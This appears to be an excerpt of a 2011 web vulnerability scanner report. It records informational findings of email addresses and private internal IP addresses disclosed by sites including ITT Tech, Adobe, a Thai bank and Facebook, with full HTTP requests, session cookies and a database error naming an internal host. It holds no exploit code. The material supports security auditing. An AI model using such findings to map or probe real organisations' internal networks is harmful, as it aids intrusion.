Server: Apache/2.2.17
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7c4e00d12966c6a9d383111e612e1a5=930e9cbe73ffe1e034211a76fd8b0066; path=/
Last-Modified: Tue, 03 May 2011 13:43:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="mailto:info@zlmc.org">info@zlmc.org</a>
...[SNIP]...

26.100. http://www2.itt-tech.edu/CFIDE/scripts/cfform.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /CFIDE/scripts/cfform.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /CFIDE/scripts/cfform.js HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.itt-tech.edu/it/d/applynow/
Cookie: ITD=12268064030%7Cnetworking%20security; FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:51 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Last-Modified: Mon, 24 Apr 2006 15:39:55 GMT
ETag: "3350a-5351-cd6a8c0"
Accept-Ranges: bytes
Content-Length: 21329
Content-Type: application/x-javascript

/*
* Copyright (c) 1995-2005 Macromedia, Inc. All rights reserved.
*/
// ColdFusion JavaScript functions for cfform client-side validation
var _CF_error_messages = new Array();
var _CF_error_fi
...[SNIP]...
-9]{4}$/, required);
}

/**
* validate that the value is formatted as an email address correctly
*
* this regex matches the majoriity of all email address.
* example matches.
* Matches: [rick.jones@unit.army.mil], [john_doe@foobar.com], [foo99@foo.co.uk]
* Non-Matches: [find_the_mistake.@foo.org], [.prefix.@some.net]
*
* _CF_checkURL mailto uses this same email regex - keep in sync.
*/
function _CF_checkEmail(object_value, required)
{
   //trim whitespace before we validate
object_value = object_value
...[SNIP]...
m/index.cfm/userid/1/name/mike+nimer - trick used by cf developers so search engines can parse their sites (search engines ignore query strings)
* ftp://www.mm.com/
* ftp://uname:pass@www.mm.com/
* mailto:email@address.com
* news:rec.gardening
* news:rec.gardening
* http://a/
*            file://ftp.yoyodyne.com/pub/files/foobar.txt
* Non-Matches: www.yahoo.com
* http:www.mm.co
...[SNIP]...

26.101. http://www2.itt-tech.edu/it/d/applynow/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /it/d/applynow/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /it/d/applynow/ HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.itt-tech.edu/it/d/?code=12268064030|networking%20security
Cookie: ITD=12268064030%7Cnetworking%20security; FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:15 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Content-Language: en-
Content-Type: text/html; charset=UTF-8
Content-Length: 45480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
following string represents an atom (basically a series of non-special characters.) */

var atom=validChars + '+';

/* The following string represents one word in the typical username.
For example, in john.doe@somewhere.com, john and doe are words.
Basically, a word is either an atom or quoted string. */

var word="(" + atom + "|" + quotedUser + ")";

// The following pattern describes the structure of the user

var user
...[SNIP]...
<!-- Original: Simon Tneoh (tneohcb@pc.jaring.my) -->
...[SNIP]...

27. Private IP addresses disclosed  previous  next
There are 17 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


27.1. http://get.adobe.com/flashplayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /flashplayer/ HTTP/1.1
Host: get.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:31 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Thu, 25-Apr-2041 13:22:32 GMT;path=/cfusion/
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...
           s_pageName: "http://get.adobe.com: Flash: en : Learn More Modal"
           },
           systemRequirementsModal: {
               uri: "/flashplayer/modal/?height=680&width=600&content=flashSystemRequirement&loc=en&version=10.2.159.1&os=Windows&dist=Vista",
               s_pageName: "http://get.adobe.com: Flash: en : Systems Requirements Modal"
           },
           distributeModal: {
               uri: "/flashplayer/modal/?height=400&width=500&content=flashDistr
...[SNIP]...
<span id="clientversion">10.2.159.1</span>
...[SNIP]...

27.2. http://moneytalk.scb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=GEOJLEJDGIKJLKHHJGMGMDID; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected: &quot;10.6.6.84&quot;. Communication function detecting the error: &quot;connect&quot;. Protocol specific error code(s): &quot;10060&quot;, &quot;*&quot;, &quot;*&quot;. SQLSTATE=08001
</font>
...[SNIP]...

27.3. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/CormVv6JMOl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yZ/r/CormVv6JMOl.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yZ/r/CormVv6JMOl.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&layout=standard&show_faces=false&width=260&action=like&font=arial&colorscheme=light&height=25

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 22 Apr 2011 12:13:12 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30614184
Expires: Sat, 21 Apr 2012 21:23:00 GMT
Date: Tue, 03 May 2011 13:26:36 GMT
Connection: close
Content-Length: 67850

/*1303507384,169776320*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JYXUq"]); }

!function(){function a(b){return function(){if(this===window)throw new TypeError();return b.apply(this,argum
...[SNIP]...

27.4. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/g5ZRpvzi0gh.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yb/r/g5ZRpvzi0gh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yb/r/g5ZRpvzi0gh.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&layout=standard&show_faces=false&width=260&action=like&font=arial&colorscheme=light&height=25

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 28 Apr 2011 07:47:18 GMT
X-FB-Server: 10.138.64.186
Vary: Accept-Encoding
Cache-Control: public, max-age=31099978
Expires: Fri, 27 Apr 2012 12:19:32 GMT
Date: Tue, 03 May 2011 13:26:34 GMT
Connection: close
Content-Length: 32607

/*1303993207,176832698*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

27.5. http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yg/r/vnWtCAcBiXn.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yg/r/vnWtCAcBiXn.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&layout=standard&show_faces=false&width=260&action=like&font=arial&colorscheme=light&height=25

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 27 Apr 2011 01:23:17 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30974990
Expires: Thu, 26 Apr 2012 01:36:24 GMT
Date: Tue, 03 May 2011 13:26:34 GMT
Connection: close
Content-Length: 36644

/*1303868193,169775812*/

if (window.CavalryLogger) { CavalryLogger.start_js(["uBXoU"]); }

if(!window.skipDomainLower&&navigator&&navigator.userAgent&&document.domain.toLowerCase().match(/(^|\.)faceb
...[SNIP]...

27.6. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/wFcdvtg8yWA.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/wFcdvtg8yWA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/wFcdvtg8yWA.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&layout=standard&show_faces=false&width=260&action=like&font=arial&colorscheme=light&height=25

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 08 Apr 2011 20:26:52 GMT
X-FB-Server: 10.138.64.186
Vary: Accept-Encoding
Cache-Control: public, max-age=29403698
Expires: Sat, 07 Apr 2012 21:08:14 GMT
Date: Tue, 03 May 2011 13:26:36 GMT
Connection: close
Content-Length: 25640

/*1302296848,176832698*/

if (window.CavalryLogger) { CavalryLogger.start_js(["KhOUG"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

27.7. http://static.ak.fbcdn.net/rsrc.php/v1/zy/r/-cydlOAMbwG.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zy/r/-cydlOAMbwG.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zy/r/-cydlOAMbwG.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/g5ZRpvzi0gh.css

Response

HTTP/1.1 200 OK
Content-Length: 1040
Content-Type: image/png
Last-Modified: Mon, 25 Apr 2011 17:15:59 GMT
X-FB-Server: 10.138.64.186
Cache-Control: public, max-age=30937614
Expires: Wed, 25 Apr 2012 15:13:31 GMT
Date: Tue, 03 May 2011 13:26:37 GMT
Connection: close

.PNG
.
...IHDR...............t.....PLTE......444l.....6X................fff...;Y....s.....ddd.........DDD....7t...UUU......Ql..;u.E..........cx.u.................MMM.........h........8qbw.~~~....9z
...[SNIP]...

27.8. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Thu, 02-Jun-2011 13:34:05 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.127
Connection: close
Date: Tue, 03 May 2011 13:34:05 GMT
Content-Length: 0


27.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.201.57
X-Cnection: close
Date: Tue, 03 May 2011 12:24:22 GMT
Content-Length: 0


27.10. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.199.107
Connection: close
Date: Tue, 03 May 2011 13:34:13 GMT
Content-Length: 22

Invalid Application ID

27.11. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.235.61
X-Cnection: close
Date: Tue, 03 May 2011 12:12:45 GMT
Content-Length: 0


27.12. http://www.facebook.com/pages/KTB-Care/178373518915  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/KTB-Care/178373518915

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/KTB-Care/178373518915 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=z8-YA; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.171.104
Connection: close
Date: Tue, 03 May 2011 13:34:01 GMT
Content-Length: 239760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

27.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110503_0700%26ssh%3DS995825291%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.47.43
X-Cnection: close
Date: Tue, 03 May 2011 12:12:45 GMT
Content-Length: 8633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27.14. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.161.111
Connection: close
Date: Tue, 03 May 2011 13:34:03 GMT
Content-Length: 7926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27.15. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&layout=standard&show_faces=false&width=260&action=like&font=arial&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.175.123
X-Cnection: close
Date: Tue, 03 May 2011 13:33:15 GMT
Content-Length: 7778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27.16. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf
If-Modified-Since: Mon, 02 May 2011 18:52:38 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 03 May 2011 00:43:41 GMT
Date: Tue, 03 May 2011 10:20:30 GMT
Expires: Tue, 03 May 2011 10:20:30 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
